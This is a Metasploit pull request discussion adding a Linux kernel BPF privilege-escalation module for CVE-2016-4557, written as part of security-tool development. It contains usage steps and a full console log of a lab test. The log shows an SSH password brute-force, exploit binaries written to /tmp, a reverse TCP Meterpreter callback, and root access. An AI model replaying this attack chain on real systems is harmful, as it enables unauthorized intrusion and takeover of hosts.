### PR TITLE
Linux Kernel BPF Priv Esc (CVE-2016-4557)

### PR DESCRIPTION
**Pull request by h00die**
Exploits CVE-2016-4557.  Metasm wasn't able to compile (no fuse.h from libfuse package), so I went with a check to either compile live on host if all the packages for building were there, or drop binaries.

Ubuntu (Desktop and Server) 16.04 w/ the default 4.4.0-21 kernel works great, i've also had it working with the updated kernel 4.4.0-38
## Verification

List the steps needed to make sure this thing works
- [x] Start `msfconsole`
- [x] get an initial shell
- [x] `use exploit/linux/local/bpf_priv_esc`
- [x] `set session #`
- [x] `set verbose true`
- [x] `set target #`
- [x] `check`
- [x] `exploit`
- [x] enjoy being root

There are 3 things that bother me about this module that I think can help it, but I'm unsure how to accomplish them.
1. When going with mettle payload `shell` and some of the commands don't work. `getuid` and `sysinfo` work fine, but some others dont.
2. `doubleput` and `hello` are still running when you get a shell back, and `doubleput` often is chewing 90%+ CPU.  With those running, you can't unmount /tmp/fuse_mount and remove it.  Killing them manually works, but my attempts at killing them via `cleanup` function calls of `cmd_exec` or through (i forgot the exact name) on_shell function also failed.

So in summary, this module works, but it could be better!

### CODE REVIEW

**Comment by egypt** [comment]
You shouldn't need the full libwhatever.h to live in metasm to be able to compile with metasm. You can still compile to use the target system's libwhatever.so by including the `#define`s, function signatures, etc that you're actually using. The `factorize` method was created just for that purpose. See modules/exploits/linux/local/sock_sendpage.rb and modules/exploits/linux/local/udev_netlink.rb for what that looks like.

**Comment by h00die** [comment]
I think i can solve some of the cleanup/original session locking issues with a defaultoption of prependfork.

I'll give that a try tomorrow, see if it doesn't help with much of the issues.

**Comment by h00die** [comment]
prepend fork fixed the origin shell being stuck.  removed that from the list of issues

**Comment by pbarry-r7** [comment]
Verified on my Ubuntu 16.04 x64 VM (4.4.0-21 kernel):

```
pbarry@ubuntu-1604-pbarry:~/metasploit-framework$ ./msfconsole 
                                                  

         .                                         .
 .

      dBBBBBBb  dBBBP dBBBBBBP dBBBBBb  .                       o
       '   dB'                     BBP
    dB'dB'dB' dBBP     dBP     dBP BB
   dB'dB'dB' dBP      dBP     dBP  BB
  dB'dB'dB' dBBBBP   dBP     dBBBBBBB

                                   dBBBBBP  dBBBBBb  dBP    dBBBBP dBP dBBBBBBP
          .                  .                  dB' dBP    dB'.BP
                             |       dBP    dBBBB' dBP    dB'.BP dBP    dBP
                           --o--    dBP    dBP    dBP    dB'.BP dBP    dBP
                             |     dBBBBP dBP    dBBBBP dBBBBP dBP    dBP

                                                                    .
                .
        o                  To boldly go where no
                            shell has gone before


       =[ metasploit v4.12.29-dev-7e6facd                 ]
+ -- --=[ 1586 exploits - 903 auxiliary - 272 post        ]
+ -- --=[ 457 payloads - 39 encoders - 8 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf > use auxiliary/scanner/ssh/ssh_login
msf auxiliary(ssh_login) > set rhosts 10.0.2.36
rhosts => 10.0.2.36
msf auxiliary(ssh_login) > set username bobbob
username => bobbob
msf auxiliary(ssh_login) > set password password
password => password
msf auxiliary(ssh_login) > exploit

[*] SSH - Starting bruteforce
[+] SSH - Success: 'bobbob:password' 'uid=1000(bobbob) gid=1000(bobbob) groups=1000(bobbob),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare) Linux pb-ubuntu-internalonly 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux '
[*] Command shell session 1 opened (10.0.2.4:41388 -> 10.0.2.36:22) at 2016-11-11 16:30:09 -0600
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(ssh_login) > sessions

Active sessions
===============

  Id  Type         Information                         Connection
  --  ----         -----------                         ----------
  1   shell linux  SSH bobbob:password (10.0.2.36:22)  10.0.2.4:41388 -> 10.0.2.36:22 (10.0.2.36)

msf auxiliary(ssh_login) > use exploit/linux/local/bpf_priv_esc
msf exploit(bpf_priv_esc) > set verbose true
verbose => true
msf exploit(bpf_priv_esc) > set session 1
session => 1
msf exploit(bpf_priv_esc) > set lhost 10.0.2.4
lhost => 10.0.2.4
msf exploit(bpf_priv_esc) > run

[*] Started reverse TCP handler on 10.0.2.4:4444 
[+] CONFIG_BPF_SYSCAL is set to yes
[+] kernel.unprivileged_bpf_disabled is NOT set to 1
[+] fuse is installed
[+] /tmp/fuse_mount doesn't exist
[-] libfuse-dev is not installed.  Compiling will fail.
[*] Dropping pre-compiled exploit on system
[*] Writing files to target
[*] Writing hello to /tmp/hello
[*] Max line length is 65537
[*] Writing 9576 bytes in 1 chunks of 24954 bytes (octal-encoded), using printf
[*] Writing doubleput to /tmp/doubleput
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (2412016 bytes) to 10.0.2.36
[*] Max line length is 65537
[*] Writing 13920 bytes in 1 chunks of 36828 bytes (octal-encoded), using printf
[*] Writing suidhelper to /tmp/suidhelper
[*] Max line length is 65537
[*] Writing 8840 bytes in 1 chunks of 21824 bytes (octal-encoded), using printf
[*] Writing payload to /tmp/AyDJSaMM
[*] Max line length is 65537
[*] Writing 206 bytes in 1 chunks of 562 bytes (octal-encoded), using printf
[*] Starting execution of priv esc.  This may take about 120 seconds
[+] got root, starting payload
[-] This exploit may require process killing of 'hello', and 'doubleput' on the target
[-] This exploit may require manual umounting of /tmp/fuse_mount via 'fusermount -z -u /tmp/fuse_mount' on the target
[-] This exploit may require manual deletion of /tmp/fuse_mount via 'rm -rf /tmp/fuse_mount' on the target
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (2412016 bytes) to 10.0.2.36
[*] Meterpreter session 2 opened (10.0.2.4:4444 -> 10.0.2.36:45608) at 2016-11-11 16:32:03 -0600
[!] This exploit may require manual cleanup of '/tmp/hello' on the target
[!] This exploit may require manual cleanup of '/tmp/doubleput' on the target
[!] This exploit may require manual cleanup of '/tmp/suidhelper' on the target
[!] This exploit may require manual cleanup of '/tmp/AyDJSaMM' on the target

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
```

**Comment by pbarry-r7** [comment]
# Release Notes

This new exploit module targets a BPF vulnerability in certain Linux kernel versions ([CVE-2016-4557](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4557)), resulting in privilege escalation.
